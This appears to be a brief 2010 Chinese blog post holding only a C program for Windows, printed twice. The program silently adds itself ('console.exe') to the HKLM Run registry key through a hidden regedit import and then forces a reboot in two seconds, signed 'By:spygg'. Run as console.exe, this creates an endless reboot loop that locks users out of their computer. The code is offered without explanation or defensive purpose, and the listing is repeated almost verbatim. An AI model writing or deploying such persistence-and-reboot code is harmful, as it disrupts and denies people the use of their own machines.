作者在 2010-05-03 09:39:31 发布以下内容
#include<stdio.h>
#include<dos.h>
#include<process.h>
int main()
{
int flag;
FILE *fp;
fp=fopen("c:\\windows\\system32\\console.reg","wb");
fprintf(fp,"%s\n","REGEDIT4");
fprintf(fp,"%s","[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"MyRegist\"=\"c:\\\\windows\\\\system32\\\\console.exe\"");
fclose(fp);
flag=system("regedit /s c:\\windows\\system32\\console.reg");
system("shutdown -r -t 2 -c By:spygg");
return 0;
}
#include<dos.h>
#include<process.h>
int main()
{
int flag;
FILE *fp;
fp=fopen("c:\\windows\\system32\\console.reg","wb");
fprintf(fp,"%s\n","REGEDIT4");
fprintf(fp,"%s","[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"MyRegist\"=\"c:\\\\windows\\\\system32\\\\console.exe\"");
fclose(fp);
flag=system("regedit /s c:\\windows\\system32\\console.reg");
system("shutdown -r -t 2 -c By:spygg");
return 0;
}